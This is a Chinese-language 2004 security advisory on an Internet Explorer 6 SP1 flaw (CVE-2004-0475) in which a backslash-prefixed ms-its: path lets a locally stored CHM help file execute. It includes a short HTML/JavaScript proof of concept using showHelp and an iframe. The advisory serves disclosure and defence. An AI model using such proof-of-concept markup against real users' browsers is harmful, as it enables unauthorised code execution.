发布日期：2004-05-14
更新日期：2004-05-20

受影响系统：

Microsoft Internet Explorer 6.0SP1

描述：

---

BUGTRAQ  ID: 10348
CVE(CAN) ID: CVE-2004-0475

Microsoft Internet Explorer是一款流行的WEB浏览器。

Microsoft Internet Explorer存在问题，远程攻击者可以利用这个漏洞未授权执行本地存储的CHM文件。

虽然之前的IE补丁已经修补了Showhelp执行CHM文件，但是由于协议处理器不正确处理"\"，当"\\"放置在目标CHM文件名之前时， 就会在HELP文件夹中搜索此名，如果HELP文件夹不包含此文件，就会转向ROOT目录中搜索，如果文件被搜索到就会被执行。不过此执行需要本地电脑域执行，攻击者需要利用其他漏洞绕过本地电脑安全域。

攻击者可以构建恶意链接，诱使用户处理。

<*来源：Roozbeh Afrasiabi （roozbeh_afrasiabi@yahoo.com）
  
  链接：http://www.securityfocus.com/archive/1/363202
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Roozbeh Afrasiabi （roozbeh_afrasiabi@yahoo.com）提供了如下测试方法：

<html>
<head>
<title>POC</title>
<p><br><b>HTM help file opened in an iframe</b><br><br>
<iframe id="target" width="700" height="400" src="ms-its:" name="target" scrolling="yes">
</iframe>
<!----SCRIPT LANGUAGE=javascript>
function getlink(){
showHelp("ms-its:\\ntshared.chm::/copyright.htm");
target.location="ms-its:\\ntshared.chm::/copyright.htm";
}
<!-----/script>
</head>
<body onload=getlink()>
</body>
</html>

建议：

---

厂商补丁：

Microsoft
---------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.microsoft.com/windows/ie/default.asp

浏览次数：4230
严重程度：0（网友投票）